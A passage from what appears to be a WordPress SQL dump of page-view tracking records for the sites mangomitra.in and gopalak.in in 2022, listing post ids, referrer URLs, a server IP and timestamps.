19:45:30'),(1820,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:45:38'),(1821,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 19:45:46'),(1822,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 23:26:12'),(1823,9,0,0,128,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 23:26:25'),(1824,9,0,0,129,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 23:27:02'),(1825,0,0,1,1069,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 23:27:18'),(1826,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 23:27:50'),(1827,0,0,1,1125,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-13 23:28:05'),(1828,0,0,1,1126,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:25:27'),(1829,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:25:38'),(1830,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:26:09'),(1831,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:26:20'),(1832,0,0,1,1122,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:26:43'),(1833,0,0,1,1123,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:26:51'),(1834,0,0,1,1137,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:27:01'),(1835,0,0,1,1138,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:27:11'),(1836,0,0,1,1093,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:27:20'),(1837,0,0,1,1131,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 00:27:33'),(1838,0,0,1,1132,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:08:51'),(1839,0,0,1,1128,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:09:00'),(1840,0,0,1,1129,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:09:14'),(1841,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:09:23'),(1842,0,0,1,1134,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:09:33'),(1843,0,0,1,1135,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:09:43'),(1844,0,0,1,1120,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:09:53'),(1845,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:10:02'),(1846,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:10:21'),(1847,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:10:31'),(1848,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:41:14'),(1849,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:41:37'),(1850,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:41:53'),(1851,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:42:11'),(1852,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:42:22'),(1853,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:42:38'),(1854,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 01:42:47'),(1855,0,0,1,1137,21,'','3.110.242.160','','','','2022-08-14 07:20:36'),(1856,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 16:46:28'),(1857,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-14 18:10:32'),(1858,0,0,1,1264,21,'','3.110.242.160','','','','2022-08-15 01:05:13'),(1859,0,0,1,1135,21,'','3.110.242.160','','','','2022-08-15 01:14:06'),(1860,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-15 01:34:21'),(1861,0,0,1,1131,21,'','3.110.242.160','','','','2022-08-15 01:34:49'),(1862,0,0,1,1137,21,'','3.110.242.160','','','','2022-08-15 01:34:54'),(1863,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-15 15:32:55'),(1864,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:14:03'),(1865,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:14:19'),(1866,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:14:39'),(1867,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:14:49'),(1868,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:15:11'),(1869,0,0,1,1141,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:15:20'),(1870,0,0,1,1170,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:15:30'),(1871,0,0,1,1086,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:15:48'),(1872,0,0,1,1088,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:16:01'),(1873,0,0,1,1145,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 20:16:12'),(1874,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 22:10:34'),(1875,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 22:10:58'),(1876,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 22:11:35'),(1877,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 22:12:04'),(1878,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 22:13:05'),(1879,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 22:13:37'),(1880,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 22:13:53'),(1881,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-15 22:14:09'),(1882,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 00:22:08'),(1883,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 00:22:22'),(1884,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 00:23:49'),(1885,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 00:24:04'),(1886,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 00:24:30'),(1887,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 00:24:41'),(1888,0,1,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 00:24:58'),(1889,9,0,0,128,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 00:25:11'),(1890,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-16 00:40:39'),(1891,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-16 00:45:16'),(1892,9,0,0,129,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 02:26:15'),(1893,0,0,1,1069,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 02:26:32'),(1894,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 02:26:59'),(1895,0,0,1,1125,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 02:27:14'),(1896,0,0,1,1126,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 02:27:24'),(1897,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 02:27:33'),(1898,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 02:27:47'),(1899,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 04:27:05'),(1900,0,0,1,1122,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 04:27:14'),(1901,0,0,1,1123,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 04:27:22'),(1902,0,0,1,1137,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 04:27:31'),(1903,0,0,1,1138,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 04:27:39'),(1904,0,0,1,1093,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 04:27:48'),(1905,0,0,1,1131,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 04:27:59'),(1906,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-16 06:11:59'),(1907,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-16 06:12:10'),(1908,0,0,1,1132,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 06:32:57'),(1909,0,0,1,1128,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 06:33:07'),(1910,0,0,1,1129,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 06:33:17'),(1911,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 06:33:26'),(1912,0,0,1,1134,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 06:33:35'),(1913,0,0,1,1135,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 06:33:43'),(1914,0,0,1,1120,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 06:33:51'),(1915,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 08:24:57'),(1916,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 08:25:12'),(1917,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 08:25:20'),(1918,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 08:25:28'),(1919,9,0,0,130,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 08:25:40'),(1920,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 08:25:48'),(1921,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 10:12:13'),(1922,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 10:12:21'),(1923,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 10:12:30'),(1924,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 10:12:56'),(1925,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 14:24:11'),(1926,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 14:24:18'),(1927,0,0,1,1091,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 14:24:34'),(1928,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 14:24:42'),(1929,0,0,1,1102,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 14:24:50'),(1930,0,0,1,1117,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 14:24:59'),(1931,9,0,0,127,1,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 14:25:07'),(1932,0,0,1,1097,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:46:52'),(1933,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:14'),(1934,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:18'),(1935,0,0,1,1161,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:23'),(1936,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:26'),(1937,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:28'),(1938,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:31'),(1939,0,0,1,1167,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:33'),(1940,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:36'),(1941,0,0,1,1169,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:39'),(1942,0,0,1,1170,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:44'),(1943,0,0,1,1109,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:49'),(1944,0,0,1,1111,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:47:56'),(1945,0,0,1,1117,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:48:03'),(1946,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:48:10'),(1947,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:48:17'),(1948,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 16:48:24'),(1949,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-16 17:46:08'),(1950,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:48:47'),(1951,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:48:51'),(1952,0,0,1,1161,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:48:56'),(1953,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:48:59'),(1954,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:02'),(1955,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:04'),(1956,0,0,1,1167,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:06'),(1957,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:09'),(1958,0,0,1,1169,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:11'),(1959,0,0,1,1170,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:17'),(1960,0,0,1,1109,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:22'),(1961,0,0,1,1111,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:28'),(1962,0,0,1,1117,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:35'),(1963,1,0,0,0,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:41'),(1964,0,0,1,1264,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:48'),(1965,0,0,1,1114,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:49:55'),(1966,0,0,1,1116,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:50:01'),(1967,0,0,1,1119,21,'https://mangomitra.in/','3.110.242.160','','','','2022-08-16 17:50:07'),(1968,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-17 21:26:01'),(1969,9,0,0,85,1,'','3.110.242.160','','','','2022-08-18 02:09:53'),(1970,0,0,1,1125,21,'','3.110.242.160','','','','2022-08-18 07:30:00'),(1971,0,0,1,1125,21,'','3.110.242.160','','','','2022-08-18 20:45:32'),(1972,0,0,1,1137,21,'','3.110.242.160','','','','2022-08-20 01:31:43'),(1973,0,0,1,1135,21,'','3.110.242.160','','','','2022-08-20 04:41:29'),(1974,0,0,1,1131,21,'','3.110.242.160','','','','2022-08-20 05:28:11'),(1975,0,0,1,1170,21,'','3.110.242.160','','','','2022-08-20 07:19:59'),(1976,9,0,0,36,1,'','3.110.242.160','','','','2022-08-21 02:29:25'),(1977,1,0,0,0,21,'','3.110.242.160','','','','2022-08-21 05:20:30'),(1978,9,0,0,37,1,'','3.110.242.160','','','','2022-08-21 06:29:15'),(1979,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-21 10:52:13'),(1980,0,0,1,1264,21,'','3.110.242.160','','','','2022-08-21 13:18:55'),(1981,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-21 14:21:06'),(1982,9,0,0,77,1,'','3.110.242.160','','','','2022-08-24 01:34:33'),(1983,9,0,0,38,1,'','3.110.242.160','','','','2022-08-24 02:13:04'),(1984,9,0,0,130,1,'','3.110.242.160','','','','2022-08-24 03:11:57'),(1985,0,0,1,1091,21,'','3.110.242.160','','','','2022-08-24 04:17:02'),(1986,0,0,1,1097,21,'','3.110.242.160','','','','2022-08-24 05:22:41'),(1987,9,0,0,35,1,'','3.110.242.160','','','','2022-08-24 06:30:17'),(1988,0,0,1,1138,21,'','3.110.242.160','','','','2022-08-24 07:20:28'),(1989,0,0,1,1122,21,'','3.110.242.160','','','','2022-08-24 08:11:44'),(1990,9,0,0,37,1,'','3.110.242.160','','','','2022-08-24 09:28:17'),(1991,0,0,1,1132,21,'','3.110.242.160','','','','2022-08-24 09:28:22'),(1992,0,0,1,1167,21,'','3.110.242.160','','','','2022-08-24 10:24:41'),(1993,1,0,0,0,21,'','3.110.242.160','','','','2022-08-24 10:24:47'),(1994,0,0,1,1129,21,'','3.110.242.160','','','','2022-08-24 11:11:48'),(1995,9,0,0,36,1,'','3.110.242.160','','','','2022-08-24 11:11:54'),(1996,0,0,1,1114,21,'','3.110.242.160','','','','2022-08-24 13:07:29'),(1997,0,0,1,1137,21,'','3.110.242.160','','','','2022-08-24 13:58:33'),(1998,0,0,1,1120,21,'','3.110.242.160','','','','2022-08-25 18:20:37'),(1999,1,0,0,0,21,'','3.110.242.160','','','','2022-08-26 01:53:26'),(2000,0,0,1,1135,21,'','3.110.242.160','','','','2022-08-26 05:29:15'),(2001,0,0,1,1135,21,'','3.110.242.160','','','','2022-08-26 16:36:37'),(2002,0,0,1,1264,21,'','3.110.242.160','','','','2022-08-26 22:57:12'),(2003,0,0,1,1082,21,'','3.110.242.160','','','','2022-08-27 14:27:52'),(2004,0,0,1,1143,21,'','3.110.242.160','','','','2022-08-27 14:27:54'),(2005,0,0,1,1140,21,'','3.110.242.160','','','','2022-08-27 14:27:55'),(2006,0,0,1,1145,21,'','3.110.242.160','','','','2022-08-27 14:27:59'),(2007,1,0,0,0,21,'https://mangomitra.in/?author=6','3.110.242.160','','','','2022-08-27 17:31:38'),(2008,0,0,1,1116,21,'','3.110.242.160','','','','2022-08-27 22:53:26'),(2009,0,0,1,1085,21,'','3.110.242.160','','','','2022-08-27 23:15:00'),(2010,0,0,1,1144,21,'','3.110.242.160','','','','2022-08-27 23:15:07'),(2011,0,0,1,1087,21,'','3.110.242.160','','','','2022-08-27 23:15:09'),(2012,0,0,1,1095,21,'','3.110.242.160','','','','2022-08-27 23:15:16'),(2013,0,0,1,1089,21,'','3.110.242.160','','','','2022-08-27 23:15:33'),(2014,0,0,1,1092,21,'','3.110.242.160','','','','2022-08-27 23:15:38'),(2015,0,0,1,1083,21,'','3.110.242.160','','','','2022-08-27 23:15:47'),(2016,0,0,1,1134,21,'','3.110.242.160','','','','2022-08-28 00:22:12'),(2017,0,0,1,1161,21,'','3.110.242.160','','','','2022-08-28 02:09:52'),(2018,1,0,0,0,21,'','3.110.242.160','','','','2022-08-28 02:26:39'),(2019,0,0,1,1084,21,'','3.110.242.160','','','','2022-08-28 03:03:52'),(2020,0,0,1,1131,21,'','3.110.242.160','','','','2022-08-28 03:06:25'),(2021,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-28 04:08:30'),(2022,9,0,0,127,1,'','3.110.242.160','','','','2022-08-28 05:07:35'),(2023,0,0,1,1135,21,'','3.110.242.160','','','','2022-08-28 06:19:56'),(2024,9,0,0,85,1,'','3.110.242.160','','','','2022-08-28 06:20:01'),(2025,0,0,1,1109,21,'','3.110.242.160','','','','2022-08-28 07:19:28'),(2026,0,0,1,1125,21,'','3.110.242.160','','','','2022-08-28 08:01:10'),(2027,0,0,1,1107,21,'','3.110.242.160','','','','2022-08-29 02:00:30'),(2028,0,0,1,1109,21,'','3.110.242.160','','','','2022-08-29 06:18:53'),(2029,0,0,1,1082,21,'','3.110.242.160','','','','2022-08-29 15:13:55'),(2030,0,0,1,1085,21,'','3.110.242.160','','','','2022-08-30 00:44:30'),(2031,0,0,1,1119,21,'','3.110.242.160','','','','2022-08-30 04:47:53'),(2032,0,0,1,1084,21,'','3.110.242.160','','','','2022-08-30 05:40:57'),(2033,0,0,1,1287,21,'','3.110.242.160','','','','2022-08-30 13:08:40'),(2034,0,0,1,1289,21,'','3.110.242.160','','','','2022-08-30 13:08:55'),(2035,9,0,0,130,1,'','3.110.242.160','','','','2022-08-30 13:08:59'),(2036,0,0,1,1263,21,'','3.110.242.160','','','','2022-08-31 14:04:16'),(2037,0,0,1,1123,21,'','3.110.242.160','','','','2022-08-31 22:53:00'),(2038,0,0,1,1135,21,'','3.110.242.160','','','','2022-09-01 05:39:22'),(2039,0,0,1,1264,21,'','3.110.242.160','','','','2022-09-01 07:49:44'),(2040,0,0,1,1287,21,'','3.110.242.160','','','','2022-09-01 19:31:39'),(2041,0,0,1,1135,21,'','3.110.242.160','','','','2022-09-01 20:37:44'),(2042,0,0,1,1145,21,'','3.110.242.160','','','','2022-09-02 03:11:13'),(2043,0,0,1,1097,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:32:26'),(2044,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:32:57'),(2045,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:03'),(2046,0,0,1,1161,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:11'),(2047,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:14'),(2048,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:18'),(2049,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:21'),(2050,0,0,1,1165,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:25'),(2051,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:29'),(2052,0,0,1,1167,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:32'),(2053,0,0,1,1169,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:39'),(2054,0,0,1,1170,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:46'),(2055,0,0,1,1111,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 04:33:55'),(2056,0,0,1,1263,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:45:24'),(2057,0,0,1,1159,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:45:31'),(2058,0,0,1,1161,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:45:36'),(2059,0,0,1,1287,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:45:39'),(2060,0,0,1,1163,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:45:42'),(2061,0,0,1,1288,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:45:45'),(2062,0,0,1,1165,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:45:50'),(2063,0,0,1,1289,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:45:53'),(2064,0,0,1,1167,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:46:01'),(2065,0,0,1,1169,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:46:08'),(2066,0,0,1,1170,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:46:13'),(2067,0,0,1,1111,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:46:21'),(2068,0,0,1,1117,21,'https://mangomitra.in/','3.110.242.160','','','','2022-09-02 05:46:31'),(2069,1,0,0,0,21,'www.baidu.com','3.110.242.160','','','','2022-09-02 14:30:35'),(2070,9,0,0,130,1,'yahoo.com','3.110.242.160','','','','2022-09-02 14:32:44'),(2071,9,0,0,127,1,'','3.110.242.160','','','','2022-09-02 17:33:56'),(2072,9,0,0,128,1,'','3.110.242.160','','','','2022-09-02 17:33:56'),(2073,9,0,0,129,1,'','3.110.242.160','','','','2022-09-02 17:34:00'),(2074,0,0,1,1116,21,'','3.110.242.160','','','','2022-09-02 18:24:44'),(2075,0,0,1,1167,21,'','3.110.242.160','','','','2022-09-02 18:24:44'),(2076,0,0,1,1263,21,'','3.110.242.160','','','','2022-09-02 18:24:44'),(2077,0,0,1,1170,21,'','3.110.242.160','','','','2022-09-02 18:24:45'),(2078,0,0,1,1120,21,'','3.110.242.160','','','','2022-09-02 18:24:45'),(2079,9,0,0,35,1,'','3.110.242.160','','','','2022-09-02 18:24:45'),(2080,0,0,1,1163,21,'','3.110.242.160','','','','2022-09-02 18:24:46'),(2081,0,0,1,1114,21,'','3.110.242.160','','','','2022-09-02 18:24:46'),(2082,0,0,1,1111,21,'','3.110.242.160','','','','2022-09-02 18:24:46'),(2083,0,0,1,1097,21,'','3.110.242.160','','','','2022-09-02 18:24:46'),(2084,0,0,1,1159,21,'','3.110.242.160','','','','2022-09-02 18:24:47'),(2085,0,0,1,1287,21,'','3.110.242.160','','','','2022-09-02 18:24:47'),(2086,0,0,1,1117,21,'','3.110.242.160','','','','2022-09-02 18:24:47'),(2087,0,0,1,1289,21,'','3.110.242.160','','','','2022-09-02 18:24:47'),(2088,0,0,1,1109,21,'','3.110.242.160','','','','2022-09-02 18:24:47'),(2089,9,0,0,38,1,'','3.110.242.160','','','','2022-09-02 18:24:48'),(2090,0,0,1,1288,21,'','3.110.242.160','','','','2022-09-02 18:24:48'),(2091,0,0,1,1119,21,'','3.110.242.160','','','','2022-09-02 18:24:48'),(2092,0,0,1,1169,21,'','3.110.242.160','','','','2022-09-02 18:24:48'),(2093,9,0,0,37,1,'','3.110.242.160','','','','2022-09-02 18:24:48'),(2094,0,0,1,1165,21,'','3.110.242.160','','','','2022-09-02 18:24:49'),(2095,0,0,1,1161,21,'','3.110.242.160','','','','2022-09-02 18:24:49'),(2096,0,0,1,1122,21,'','3.110.242.160','','','','2022-09-02 18:24:49'),(2097,9,0,0,77,1,'','3.110.242.160','','','','2022-09-02 18:24:49'),(2098,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-19 04:33:23'),(2099,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-20 04:25:49'),(2100,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-21 05:06:26'),(2101,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-21 05:07:08'),(2102,1,0,0,0,21,'https://gopalak.in/?preview_id=1373&preview_nonce=f55b4d48f3&preview=true','3.110.242.160','','','','2022-09-21 05:59:33'),(2103,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-21 08:31:33'),(2104,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-21 09:14:07'),(2105,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-21 11:31:57'),(2106,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-30 11:04:50'),(2107,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-09-30 11:59:02'),(2108,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-10-03 08:41:04'),(2109,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-10-10 12:01:53'),(2110,1,0,0,0,21,'https://gopalak.in/?preview_id=1373&preview_nonce=e3fa1941e0&preview=true','3.110.242.160','','','','2022-10-10 12:04:32'),(2111,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-10-10 12:47:38'),(2112,1,0,0,0,21,'https://gopalak.in/','3.110.242.160','','','','2022-10-11 04:49:25'),(2113,9,0,0,136,1,'https://gopalak.in/checkout/?postid=1755','3.110.242.160','','','','2022-10-14 05:51:23'),(2114,1,0,0,0,1,'https://gopalak.in/about-us/','3.110.242.160','','','','2022-10-14 05:53:47'),(2115,0,0,1,1755,1,'https://gopalak.in/shop/','3.110.242.160','','','','2022-10-14 05:53:52'),(2116,0,0,1,1755,1,'https://gopalak.in/product-category/donation/','3.110.242.160','','','','2022-10-14 05:54:02'),(2117,9,0,0,136,1,'https://gopalak.in/product/cow/','3.110.242.160','','','','2022-10-14 05:54:04'),(2118,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-14 05:57:46'),(2119,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-14 05:59:01'),(2120,0,0,1,1755,1,'https://gopalak.in/shop/','3.110.242.160','','','','2022-10-14 05:59:14'),(2121,0,0,1,1775,1,'https://gopalak.in/shop/','3.110.242.160','','','','2022-10-14 07:40:45'),(2122,0,0,1,1775,1,'https://gopalak.in/wp-admin/post.php?post=1775&action=edit','3.110.242.160','','','','2022-10-14 09:11:29'),(2123,0,0,1,1755,1,'https://gopalak.in/product/abc/?preview_id=1775&preview_nonce=ef2b261f3f&_thumbnail_id=1689&preview=true','3.110.242.160','','','','2022-10-14 09:11:46'),(2124,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-14 09:17:23'),(2125,0,0,1,1786,1,'https://gopalak.in/wp-admin/post.php?post=1786&action=edit','3.110.242.160','','','','2022-10-14 09:28:00'),(2126,9,0,0,135,1,'https://gopalak.in/checkout/','3.110.242.160','','','','2022-10-14 09:50:45'),(2127,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2022-10-14 10:00:23'),(2128,9,0,0,136,1,'https://gopalak.in/shop/','3.110.242.160','','','','2022-10-14 